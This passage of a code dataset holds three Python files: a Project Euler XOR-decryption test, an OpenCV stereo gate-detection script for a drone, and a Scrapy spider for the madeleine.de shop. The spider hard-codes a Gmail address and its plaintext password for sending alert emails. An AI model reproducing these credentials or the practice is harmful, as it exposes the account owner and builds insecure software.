words, \ndecrypt the message and find the sum of the ASCII values in the original text.\n\"\"\"\n\ncharacters = string.ascii_lowercase\npossible_keys = Permutations.combinations_of_length_3(characters)\nencrypted_text = [int(i) for i in Common.read_from_resources(\"59\").read().split(\",\")]\nbanned_letters = [\"~\", \"{\", \"$\", \"@\", \"%\", \"!\"]\n\n\ndef find_encrypted_text():\n for possible_key in possible_keys:\n cipher_ascii = \"\"\n text = encrypted_text\n for i in range(0, len(text)):\n j = i % len(possible_key)\n xor = text[i] ^ ord(possible_key[j])\n cipher_ascii = cipher_ascii + chr(xor)\n if len([bad_letter for bad_letter in banned_letters if bad_letter in chr(xor)]) > 0:\n break\n if len(cipher_ascii) == len(encrypted_text):\n return cipher_ascii\n\n\nclass Test(unittest.TestCase):\n def test_decrypt(self):\n encrypt = 65 ^ 42\n assert encrypt == 107\n assert encrypt ^ 42 == 65\n\n def test_result(self):\n print(sum([ord(letter) for letter in find_encrypted_text()]))\n","sub_path":"problems/solved_problems/test_059_xor_decryption.py","file_name":"test_059_xor_decryption.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"42443349","text":"#!/usr/bin/python\nimport cv2\n#import tf.transformations as tfs\nimport numpy as np\nimport math\nfrom time import strftime, localtime, time\nimport matplotlib.pyplot as plt\n\n'''\nVideoCapture settings:\n0. 
CV_CAP_PROP_POS_MSEC Current position of the video file in milliseconds.\n1. CV_CAP_PROP_POS_FRAMES 0-based index of the frame to be decoded/captured next.\n2. CV_CAP_PROP_POS_AVI_RATIO Relative position of the video file\n3. CV_CAP_PROP_FRAME_WIDTH Width of the frames in the video stream.\n4. CV_CAP_PROP_FRAME_HEIGHT Height of the frames in the video stream.\n5. CV_CAP_PROP_FPS Frame rate.\n6. CV_CAP_PROP_FOURCC 4-character code of codec.\n7. CV_CAP_PROP_FRAME_COUNT Number of frames in the video file.\n8. CV_CAP_PROP_FORMAT Format of the Mat objects returned by retrieve() .\n9. CV_CAP_PROP_MODE Backend-specific value indicating the current capture mode.\n10. CV_CAP_PROP_BRIGHTNESS Brightness of the image (only for cameras).\n11. CV_CAP_PROP_CONTRAST Contrast of the image (only for cameras).\n12. CV_CAP_PROP_SATURATION Saturation of the image (only for cameras).\n13. CV_CAP_PROP_HUE Hue of the image (only for cameras).\n14. CV_CAP_PROP_GAIN Gain of the image (only for cameras).\n15. CV_CAP_PROP_EXPOSURE Exposure (only for cameras).\n16. CV_CAP_PROP_CONVERT_RGB Boolean flags indicating whether images should be converted to RGB.\n17. CV_CAP_PROP_WHITE_BALANCE Currently unsupported\n18. CV_CAP_PROP_RECTIFICATION Rectification flag for stereo cameras (note: only supported by DC1394 v 2.x backend currently)\n\n'''\n\n# Camera Matrix\ncameraMatrix = np.array([[700.0499877929688, 0.0, 637.5999755859375],\n\t\t\t\t\t\t\t[0.0, 700.0499877929688, 382.5060119628906],\n\t\t\t\t\t\t\t[0.0, 0.0, 1.0]])\n\t\n# Distortion Coefficients\ndistCoeffs = np.array([-0.1740500032901764, 0.028304599225521088, 0.0, 0.0, 0.0])\n\t\n\t\n\ndef rvec2quat(vector):\n\tl = np.linalg.norm(vector)\n\tsin_th = math.sin(l/2)\n\tx = vector[0] /l * sin_th\n\ty = vector[1] /l * sin_th\n\tz = vector[2] /l * sin_th\n\tw = math.cos(l/2)\n\treturn np.array([x, y, z, w])\n\n\ndef quat2euler(q):\n\t #q = [x,y,z,w]\n\troll = np.arctan2( 2*(q[3]*q[0] + q[1]*q[2]), 1 - 2*(q[0]**2 + q[1]**2) )\n\tpitch = np.arcsin( 2*(q[3]*q[1] - q[0]*q[2]) )\n\tyaw = np.arctan2( 2*(q[3]*q[2] + q[0]*q[1]), 1 - 2*(q[1]**2 + q[2]**2) )\n\treturn np.array([roll,pitch,yaw])\n\n\ndef solidity(contour):\n\thull_area = cv2.contourArea(cv2.convexHull(contour))\n\tif (hull_area != 0) :\n\t\treturn float(cv2.contourArea(contour))/hull_area\n\telse:\n\t\treturn 0\n\n\ndef aspectRatio(contour):\n\tx,y,w,h = cv2.boundingRect(contour)\n\treturn float(w)/h\n\t\n\t\ndef annotateCorners(contour, img):\n\tcontour = contour.reshape(4,2).tolist()\n\tcount = 1\n\tfor point in contour:\n\t\tcv2.circle(img, (point[0], point[1]), 10, (255,255,0), 0)\n\t\tcv2.putText(img, str(count), (point[0], point[1]), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2, cv2.LINE_AA)\n\t\tcount = count + 1\n\t \n\t \ndef detect_gate_pose(img, hsv_thresh_low, hsv_thresh_high):\n\t'''\n\tDescription: The functiont takes in an image and hsv threshold values, detects \n\t\t\t\tthe largest 4-sided polygon and returns its corner coordinates.\n\t@params: \n\timg: CV2 RGB Image\n\thsv_threshold_low: Low threshold for color detection in HSV format, numpy array of length 3\n\thsv_threshold_high: High threshold for color detection in HSV format, numpy array of length 3\n\t\n\t@return:\n\tcontour: Numpy array of 4 coordinates of contour corners\n\t'''\n\theight, width, depth = img.shape\n\thalf_width = int(width/2)\n\t\n\t# Separate left and right images\n\tleft_img = img[:height, :int(width/2)]\n\tright_img = img[:height, int(width/2):width]\n\t\n\t## Undistort images\n\tleft_img = cv2.undistort(left_img, 
cameraMatrix, distCoeffs)\n\tright_img = cv2.undistort(right_img, cameraMatrix, distCoeffs)\n\timg = np.concatenate((left_img, right_img), axis=1)\n\t\n\t# Convert to HSV\n\t#hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n\t#cv2.imshow('hsv', hsv)\n\t\n\t\n\t# Convert to gray\n\t#gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\t#cv2.imshow('hsv', hsv)\n\t\n\t## Mask\n\t#mask = cv2.inRange(hsv, hsv_thresh_low, hsv_thresh_high)\n\t##print(mask)\n\t#cv2.imshow('mask', mask)\n\t\n\t# Blur \n\t#blur = cv2.GaussianBlur(mask,(3,3), 3)\n\t#cv2.imshow('Blur', blur)\n\t\n\t#cv2.imshow('undistort', undistort_img)\n\t\n\t# HSV, Mask and blur left image\n\tleft_hsv = cv2.cvtColor(left_img, cv2.COLOR_BGR2HSV)\n\t#right_hsv = cv2.cvtColor(right_img, cv2.COLOR_BGR2HSV)\n\tleft_mask = cv2.inRange(left_hsv, hsv_thresh_low, hsv_thresh_high)\n\t#right_mask = cv2.inRange(right_hsv, hsv_thresh_low, hsv_thresh_high)\n\tleft_mask = cv2.GaussianBlur(left_mask,(3,3), 2)\n\t#right_mask = cv2.inRange(right_img, hsv_thresh_low, hsv_thresh_high)\n\n\t# gray image\n\t#left_gray = cv2.cvtColor(left_img, cv2.COLOR_BGR2GRAY)\n\t#right_gray = cv2.cvtColor(right_img, cv2.COLOR_BGR2GRAY)\n\t#gray_img = np.concatenate((left_gray, right_gray), axis=1)\n\t#cv2.imshow(\"Gray image\", gray_img)\n\t\n\t## Binary image\n\t#ret,left_thresh = cv2.threshold(left_gray,127,255,cv2.THRESH_BINARY)\n\t#cv2.imshow(\"Left_thresh\", left_thresh)\n\t\n\t#print(mask)feture \n\t\n\t# SIFT feature detection\n\t#sift = cv2.SIFT()\n\t#kp = sift.detect(gray_img,None)\n\t#sift_img=cv2.drawKeypoints(gray_img,kp)\n\t#cv2.imshow('sift_img', sift_img)\n\t\n\t# Find contours\n\tcontours, hierarchy = cv2.findContours(left_mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\t#print(\"Contour_list: {}\".format(contours))\n\t\n\t# Print solidity\n\t#print(\"Contour solidities:\")\n\t#for cnt in contours:\n\t\t#print(solidity(cnt))\n\t\n\t# Draw all contours\n\t#contour_img = left_img.copy()\n\t#cv2.drawContours(contour_img, contours, -1, (0, 255, 0), 1)\n\t#cv2.imshow('contour_img', contour_img)\n\n\t# Approximate quadrilaterals\n\tquadrl=[]\n\tfor cnt in contours:\n\t\tapprox = cv2.approxPolyDP(cnt,0.10*cv2.arcLength(cnt,True),True)\n\t\tif len(approx) == 4:\n\t\t\tquadrl.append(approx)\n\t\t\t\n\t#print(\"Contours before all filters: %d\" % len(quadrl))\n\t\t\t\n\t# Filter contour by area: area > 500\n\tquadrlFiltered = list(filter(lambda x: (cv2.contourArea(x) > 1000) , quadrl))\n\t#print(\"Contours after area filter: %d\" % len(quadrlFiltered))\n\n\t# Filter for contour solidity > 0.9\n\t#quadrlFiltered = list(filter(lambda x: (solidity(x) > 0.90) , quadrlFiltered))\n\t#print(\"Contours after solidity filter: %d\" % len(quadrlFiltered))\n\t\n\t# Filter by contour aspect ratio: 1.20 > AR > 0.8\n\tquadrlFiltered = list(filter(lambda x: (aspectRatio(x) > 0.8) & (aspectRatio(x) < 1.35) , quadrlFiltered))\n\t#print(\"Contours after aspect ratio filter: %d\" % len(quadrlFiltered))\n\n\t\n\t#floodfill_img = mask.copy()\n\t\n\t\n\t#print(\"Square contour areas:\")\n\t#for sq in quadrlFiltered:\n\t\t#print(cv2.contourArea(sq))\n\t\n\t# Sort quadrilaterals by area\n\tquadrlFiltered = sorted(quadrlFiltered, key=lambda x: cv2.contourArea(x))\n\t\n\t\n\tif len(quadrlFiltered) > 0:\n\t\tgate_contour = quadrlFiltered[-1].reshape(4,2) # Return the largest square contour by area (returns coordinates of corners)\n\t\t\n\t\t# Sort the points starting with top left and going anti-clockwise\n\t\tcenter = gate_contour.mean(axis=0)\n\t\tgate_cnt_sorted = [[0,0]]*4\n\t\tfor point in 
gate_contour:\n\t\t\tif point[0] < center[0] and point[1] < center[1]:\n\t\t\t\t\tgate_cnt_sorted[0] = point\n\t\t\telif point[0] <= center[0] and point[1] >= center[1]:\n\t\t\t\t\tgate_cnt_sorted[1] = point\n\t\t\telif point[0] > center[0] and point[1] < center[1]:\n\t\t\t\tgate_cnt_sorted[3] = point\n\t\t\telse:\n\t\t\t\tgate_cnt_sorted[2] = point\n\t\t\t\t\n\t\tgate_cnt_sorted = np.array(gate_cnt_sorted)\n\t\t\n\t\tconvolve_img = []\n\t\tfor left_point in gate_cnt_sorted:\n\t\t\t#left_point = gate_cnt_sorted[2]\n\t\t\tleft_point.reshape(1,2)\n\t\t\t\n\t\t\t#print(\"H:{}, W:{}\".format(height, width))\n\t\t\t\n\t\t\t# Extract Kernel from left gray image\n\t\t\tdelta = int(0.02*half_width)\n\t\t\tkernel_left = left_img[left_point[1]-delta:left_point[1]+delta , left_point[0]-delta:left_point[0]+delta]\n\t\t\t#print(\"Left Point: {}\".format(left_point))\n\t\t\t#print(\"delta: {}\".format(delta))\n\t\t\t#print(\"kernel size: {}\".format(kernel_left.shape))\n\t\t\t#cv2.imshow(\"kernel_left\", kernel_left)\n\n\t\t\t# Get minimum cost point for the right image\n\t\t\tmin_cost_x = delta\n\t\t\tmin_cost = 1000000\n\t\t\tcost_function = []\n\t\t\tfor x in range(delta+1, half_width-delta-1):\n\t\t\t\tkernel_right = right_img[left_point[1]-delta:left_point[1]+delta , x-delta:x+delta]\n\t\t\t\tif kernel_left.shape != kernel_right.shape:\n\t\t\t\t\tcontinue\n\t\t\t\tcost = np.square(np.subtract(kernel_left, kernel_right)).sum() + (left_point[0] - x)**2\n\t\t\t\tcost_function.append(cost)\t\n\t\t\t\tif cost <= min_cost:\n\t\t\t\t\tmin_cost_x = x\n\t\t\t\t\tmin_cost = cost\n\t\t\t\t\n\t\t\tcon_img = cv2.filter2D(right_img,-1,kernel_left)\n\t\t\t#convolve_img.append(con_img)\n\t\t\t\n\t\t\t\t\n\t\t\tprint(\"Left x: {}\".format(left_point[0]))\n\t\t\tprint(\"Min cost x: {}\".format(min_cost_x))\n\n\t\t\t#matched_right = right_img[left_point[1]-delta:left_point[1]+delta , min_cost_x-delta:min_cost_x+delta]\n\t\t\t#cv2.imshow(\"Matched\", matched_right)\n\t\t\t\n\t\t\t# Draw matched portions\n\t\t\tcv2.rectangle(img, (left_point[0]-delta, left_point[1]-delta), (left_point[0]+delta, left_point[1]+delta), (255,0,0), 2)\n\t\t\tcv2.rectangle(img, (min_cost_x-delta+half_width, left_point[1]-delta), (min_cost_x+delta+half_width, left_point[1]+delta), (255,0,0), 2)\n\t\t\t\n\t\t\n\t\tcv2.imshow(\"Feature Image\", img)\n\t\t\n\n\t\tcv2.imshow(\"Convolution image\", con_img)\n\t\t\n\t\t# Calculate disparity between the two points\n\t\tdisparity = left_point[0] - min_cost_x\n\t\tprint(\"Disparity: {}\".format(disparity))\n\t\treturn disparity\t\n\telse:\n\t\tprint(\"No gate detected!\")\n\t\treturn np.nan\n\n\ndef rectifyStereoImage(img):\n\theight, width = img.shape[:2]\n\t\n\tleft_img = img[:height, :int(width/2)]\n\tright_img = img[:height, int(width/2):width]\n\t\n\t\ndef getGatePosePnP(contour, objectPoints):\n\t## Camera Position wrt drone\n\t#dTc = [0, 0, 0]\n\t\n\t##Camera Rotation wrt drone\n\tdRc = np.array([[0,0,1],[-1,0,0],[0,-1,0]])\n\t#dQuatC = tfs.quaternion_from_matrix(dRc)\n\tdQuatC = [ 0.5, -0.5, 0.5, -0.5 ]\n\t\n\t# Camera Matrix\n\tcameraMatrix = np.array([[700.0499877929688, 0.0, 637.5999755859375],\n\t\t\t\t\t\t\t[0.0, 700.0499877929688, 382.5060119628906],\n\t\t\t\t\t\t\t[0.0, 0.0, 1.0]])\n\t\n\t# Distortion Coefficients\n\tdistCoeffs = np.array([-0.1740500032901764, 0.028304599225521088, 0.0, 0.0, 0.0])\n\t\n\t# Solve perspective n point algorithm\n\t(success, rvec, tvec) = cv2.solvePnP(objectPoints, contour.reshape(4,2).astype(float), cameraMatrix, distCoeffs)\n\t\n\trvec = 
np.squeeze(rvec)\n\ttvec = np.squeeze(tvec)\n\tquat = rvec2quat(rvec)\n\t\n\tquat = tfs.quaternion_multiply(quat, dQuatC)\n\ttvec = np.matmul(dRc, tvec.reshape(3,1))\n\t\n\t\n\t#print(\"Q : {}\\nT: {}\".format(quat, tvec))\n\t\n\treturn (quat, tvec)\n\n\ndef getDisparity(left_img, right_img, left_point):\n\tleft_point.reshape(1,2)\n\theight, width, depth = left_img.shape\n\tleft_img = cv2.cvtColor(left_img, cv2.COLOR_BGR2GRAY)\n\tright_img = cv2.cvtColor(right_img, cv2.COLOR_BGR2GRAY)\n\t#print(\"H:{}, W:{}\".format(height, width))\n\t\n\t# Extract Kernel from left image\n\tdelta = 20\n\tkernel_left = left_img[left_point[1]-delta:left_point[1]+delta , left_point[0]-delta:left_point[0]+delta]\n\n\t# Get minimum cost point for the right image\n\tmin_cost_x = delta\n\tmin_cost = 1000000\n\tfor x in range(delta+1, width-delta-1, 5):\n\t\tkernel_right = right_img[left_point[1]-delta:left_point[1]+delta , x-delta:x+delta]\n\t\tcost = np.absolute(kernel_left - kernel_right).sum() + abs(left_point[0] - x)\t\n\t\tif cost <= min_cost:\n\t\t\tmin_cost_x = x\n\t\t\tmin_cost = cost\n\t\n\t#print(\"Min cost x: {}\".format(min_cost_x))\n\t#matched_right = right_img[left_point[1]-delta:left_point[1]+delta , min_cost_x-delta:min_cost_x+delta]\n\t#cv2.imshow(\"Matched\", matched_right)\n\t\n\t# Calculate disparity between the two points\n\tdisparity = left_point[0] - min_cost_x\n\tprint(\"Disparity: {}\".format(disparity))\n\treturn disparity\n\t\n\t\ndef main():\n\t# Load image\n\t#img = cv2.imread('images/gates.png', 1)\t\n\t\n\t#cap = cv2.VideoCapture(0)\n\t#cap.set(5, 100)\n\t\n\t# Gate points:\n\t#[[[299 118]]\n\n\t #[[289 204]]\n\n\t #[[377 215]]\n\n\t #[[387 130]]]\n\n\tgate_side = 103\n\tobjectPoints = np.array([\n\t\t\t(-gate_side/2, -gate_side/2, 0.0),\n\t\t\t(-gate_side/2, gate_side/2, 0.0),\n\t\t\t(gate_side/2, gate_side/2, 0.0),\n\t\t\t(gate_side/2, -gate_side/2, 0.0)\n\t\t])\n\t\n\t\n\tcap = cv2.VideoCapture(\"videos/dual_image_video_blue.mp4\")\n\t#cap = cv2.VideoCapture(0)\n\t\n\t# 720p : 2560x720 : 60 FPS\n\t# WVGA : 1344x376 : 100 FPS\n\tcap.set(5, 100)\t# FPS\n\tcap.set(3, 2560)# Image Width\n\tcap.set(4, 720)\t# Image Height\n\tcap.set(10, 0.8) # Brightness\n\tcap.set(11, 0.5) # Contrast\n\tcap.set(12, 0.5) # Saturation\n\t#cap.set(13, 0.0) # Hue\n\t\n\tframe_width = int(cap.get(3) / 2)\n\tframe_height = int(cap.get(4))\n\tprint(frame_width, frame_height)\n\t\n\tVIDEO_RECORDING = False\n\t\t \n\tif VIDEO_RECORDING:\n\t\t# Define the codec and create VideoWriter object.The output is stored in 'outpy.avi' file.\n\t\tfilename = 'videos/gate_detection_'+ strftime(\"%d-%b-%Y_%H-%M-%S\", localtime()) + '.mp4'\n\t\tout = cv2.VideoWriter(filename,cv2.VideoWriter_fourcc('M','J','P','G'), 20, (frame_width,frame_height))\n\t\n\t## Color thresholds\n\t# Blue gate\t\n\thsv_thresh_low = (90, 50, 50)\n\thsv_thresh_high = (130, 255, 255)\n\t\n\t# Green gate\n\t#hsv_thresh_low = (40, 50, 50)\n\t#hsv_thresh_high = (110, 255, 255)\n\t\n\t# Green gate rgb\n\t#hsv_thresh_low = (100, 200, 100)\n\t#hsv_thresh_high = (255, 255, 255)\n\t\n\t# Red gate\n\t#hsv_thresh_low = (130, 40, 30)\n\t#hsv_thresh_high = (200, 255, 255)\n\t\n\t# Orange gate\n\t#hsv_thresh_low = (0, 100, 100)\n\t#hsv_thresh_high = (20, 255, 255)\n\n\n\twhile(cap.isOpened()):\n\t\tstart = time()\n\t\tret, img = cap.read()\t\n\t\t\t\n\t\tif ret:\n\t\t\t#left_img = img[0:frame_height, 0:frame_width]\n\t\t\t#right_img = img[0:frame_height, frame_width: 2*frame_width]\t\t\t\n\t\t\t\n\t\t\tpose = detect_gate_pose(img, hsv_thresh_low, 
hsv_thresh_high)\n\t\t\t\n\t\t\t#left_mask = cv2.inRange(cv2.cvtColor(left_img, cv2.COLOR_BGR2HSV), hsv_thresh_low, hsv_thresh_high)\n\t\t\t#right_mask = cv2.inRange(cv2.cvtColor(right_img, cv2.COLOR_BGR2HSV), hsv_thresh_low, hsv_thresh_high)\n\t\t\t#cv2.imshow('left_mask',left_mask)\n\t\t\t#cv2.imshow('right_mask',right_mask)\n\t\t\t\n\t\t\t# PnP algorithm\n\t\t\t#quat, tvec = getGatePose(left_cnt, objectPoints)\n\t\t\t#euler = quat2euler(quat)\t\n\t\t\t\n\t\t\t#cv2.drawContours(left_img, [left_cnt.reshape(4,2)], 0, (0,0,255), 2)\n\t\t\t#cv2.circle(img, (center[0], center[1]), 10, (255,255,0), 0)\n\t\t\t#cv2.putText(img, \"X: {}, Y: {}, Z: {}\".format(tvec[0], tvec[1], tvec[2]), (10, frame_height - 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t#cv2.putText(img, \"Roll: {}, Pitch: {}, Yaw: {}\".format(euler[0], euler[1], euler[2]), (10, frame_height - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t#cv2.drawContours(img, [left_cnt], 0, (0,0,255), 2)\n\t\t\t##cv2.circle(img, (center[0], center[1]), 10, (255,255,0), 0)\n\t\t\t##cv2.putText(img, \"X: {}, Y: {}, Z: {}\".format(tvec[0], tvec[1], tvec[2]), (10, frame_height - 25), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t##cv2.putText(img, \"Roll: {}, Pitch: {}, Yaw: {}\".format(euler[0], euler[1], euler[2]), (10, frame_height - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1, cv2.LINE_AA)\n\t\t\t#annotateCorners(left_cnt, img)\n\t\t\t\n\t\t\t\n\t\t\t# Print statements\n\t\t\tprint(\"Detection rate: {} Hz\".format(1/float(time() - start)))\t\t\t\t\n\t\t\t#print(\"Brightness: {} \".format(cap.get(10)))\t\t\t\t\n\t\t\t#print(\"Saturation: {} \".format(cap.get(11)))\t\t\t\t\n\t\t\t#print(\"Contrast: {} \".format(cap.get(12)))\t\t\t\t\n\t\t\t#print(\"Hue: {} \".format(cap.get(13)))\t\t\n\t\t\t\n\t\t\tif cv2.waitKey(50) & 0xFF == ord('q'):\n\t\t\t\tbreak\n\t\t\tif VIDEO_RECORDING:\n\t\t\t\tout.write(img) \n\t\t\n\t\telse:\n\t\t\tbreak\n\t\n\tcap.release()\n\tif VIDEO_RECORDING:\n\t\tout.release()\n\tcv2.destroyAllWindows()\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"vision_scripts/gate_extraction_video_stereo.py","file_name":"gate_extraction_video_stereo.py","file_ext":"py","file_size_in_byte":15277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"419945038","text":"# -*- coding: utf-8 -*-\r\nfrom scrapy.contrib.loader.processor import TakeFirst, MapCompose, Join\r\n#from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor\r\nfrom scrapy.contrib.linkextractors.lxmlhtml import LxmlLinkExtractor\r\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\r\nfrom scrapy.selector import HtmlXPathSelector\r\nfrom scrapy.contrib.loader import ItemLoader\r\nfrom scrapy.http.cookies import CookieJar\r\nfrom scrapy.http import FormRequest, Request\r\nfrom scrapy import Spider\r\nfrom src.items import ProductItem\r\nimport time, re, json, os\r\nimport smtplib\r\nfrom scrapy import signals\r\nfrom scrapy.xlib.pydispatch import dispatcher\r\nfrom email.MIMEText import MIMEText\r\nimport collections\r\n\r\nclass MadeleineSpider(Spider):\r\n name = \"madeleinespider\"\r\n\r\n check_values = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\r\n\r\n def __init__(self):\r\n dispatcher.connect(self.spider_closed, signals.spider_closed)\r\n def spider_closed(self, spider):\r\n if not self.result_check:\r\n me = 'mmadeleinee2015@gmail.com'\r\n you = 'admin@catalogi.ru'\r\n 
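# --- Editor's example (hypothetical, not part of the dataset): converting the
# pixel disparity produced by the stereo gate-detection record above into
# metric depth via the rectified-stereo relation Z = f * B / d. focal_px
# matches the fx entry of that record's cameraMatrix; baseline_m = 0.12 is an
# assumed stereo baseline, not a value taken from the original code.
def depth_from_disparity(disparity_px, focal_px=700.0499877929688, baseline_m=0.12):
    if disparity_px <= 0:
        return float('nan')  # no valid correspondence found
    return focal_px * baseline_m / disparity_px

# e.g. a 40 px disparity would correspond to roughly 2.1 m under these values.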
text = u'MADELEINE_SPIDER\\nNot all data is being collected from the site (some fields are empty), see log.txt on the server'\r\n subj = 'MADELEINE_SPIDER'\r\n\r\n # SMTP server\r\n server = \"smtp.gmail.com\"\r\n port = 25\r\n user_name = \"mmadeleinee2015@gmail.com\"\r\n user_passwd = \"madeleine78\"\r\n\r\n # build the message\r\n msg = MIMEText(text, \"\", \"utf-8\")\r\n msg['Subject'] = subj\r\n msg['From'] = me\r\n msg['To'] = you\r\n\r\n # send it\r\n s = smtplib.SMTP(server, port)\r\n s.ehlo()\r\n s.starttls()\r\n s.ehlo()\r\n s.login(user_name, user_passwd)\r\n s.sendmail(me, you, msg.as_string())\r\n s.quit()\r\n\r\n def start_requests(self):\r\n l = [Request(url=\"http://www.madeleine.de/mode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/abendmode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/bademode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/blazer/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/blusen/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/dessous/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/freizeit-homewear/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/hosen/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/hosenanzuege/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/jacken-maentel/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/kleider/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/kostueme/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/nachtwaesche/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/overalls/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/roecke/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/shirts-tops/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/mode/strickmode/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/ballerinas/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/boots/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/mokassins/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/pumps/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/sandaletten/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/stiefel-stiefeletten/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/schuhe/pantoletten/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/guertel/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/handschuhe/\",\r\n callback=self.parse_page),\r\n 
Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/muetzen-huete/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/schals-tuecher/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/schmuck/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/sonnenbrillen/\",\r\n callback=self.parse_page),\r\n Request(url=\"http://www.madeleine.de/schuhe-accessoires/accessoires/taschen/\",\r\n callback=self.parse_page)]\r\n return l\r\n\r\n #test\r\n #product_path = \"/sandalette-mit-ziernieten-0s1023393.html\"\r\n #product_path = \"/chantelle-slip-mit-spitze-0a1027019.html\"\r\n #item = ProductItem()\r\n #item[\"path\"] = product_path\r\n\r\n #request = Request(url=\"http://www.madeleine.de\" + product_path, callback=self.parse_product)\r\n #request.meta['item'] = item\r\n\r\n #yield request\r\n\r\n def parse_page(self, response):\r\n\r\n # ------products_paths------\r\n\r\n products_paths = response.xpath(\"//div[@id='articles']/div/a/@href\").extract()\r\n\r\n for product_path in products_paths:\r\n item = ProductItem()\r\n item[\"path\"] = product_path\r\n\r\n request = Request(url=\"http://www.madeleine.de\" + product_path, callback=self.parse_product)\r\n request.meta['item'] = item\r\n\r\n yield request\r\n\r\n\r\n extr = LxmlLinkExtractor(allow=\"seite-\\d+\")\r\n links = extr.extract_links(response)\r\n\r\n for link in links:\r\n yield Request(url=link.url, callback=self.parse_page)\r\n\r\n def parse_product(self, response):\r\n item = response.meta['item']\r\n\r\n if response.xpath(\"//div[@class='soldout']\"):\r\n return\r\n\r\n # ------name------\r\n\r\n item[\"masterID\"] = response.xpath(\"substring-before(substring-after(//script[contains(text(), 'var masterId=')], 'var masterId=\\\"'), '\\\";')\").extract()[0]\r\n item[\"name\"] = response.xpath(\"string(//h1)\").extract()[0]\r\n\r\n # ------care------\r\n\r\n item[\"care\"] = \"\"\r\n\r\n careLabel_x = response.xpath(\"//ul[@id='careLabels']/li\")\r\n if careLabel_x:\r\n careLabel = careLabel_x[0].xpath(\"text()\").extract()[0] + \":\"\r\n care_num = careLabel_x[0].xpath(\"substring-after(@class, '-')\").extract()[0]\r\n careLabel = careLabel + \"http://www.madeleine.de/img/site4/article/careicon-%s.png:\" % care_num\r\n careLabel = careLabel + response.xpath(\"string(//div[contains(@class, 'carelabels')]/p[@class='info'])\").extract()[0]\r\n item[\"care\"] = careLabel\r\n\r\n # ------consist------\r\n\r\n consist_text = response.xpath(\"string(//p[@id='hardFacts'])\").extract()[0]\r\n materials = re.findall(\"\\d+%\\s+(.+?)[,.]\", consist_text)\r\n\r\n consist = \",\".join(materials)\r\n consist = consist + \":%s\" % consist_text\r\n item[\"consist\"] = consist\r\n\r\n # ------description------\r\n\r\n item[\"description\"] = response.xpath(\"string(//div[@class='content'])\").extract()[0]\r\n\r\n # ------brand------\r\n\r\n item[\"brand\"] = \"Madeleine:http://pro-allegro.by/images/logo/madeleine.png\"\r\n\r\n # ------images360 and video_url------\r\n\r\n item[\"images360\"] = \"\"\r\n item[\"video_url\"] = \"\"\r\n\r\n s360 = response.xpath(\"string(//script[contains(text(), '_Article360ViewUrl')])\").extract()[0]\r\n if s360:\r\n m = 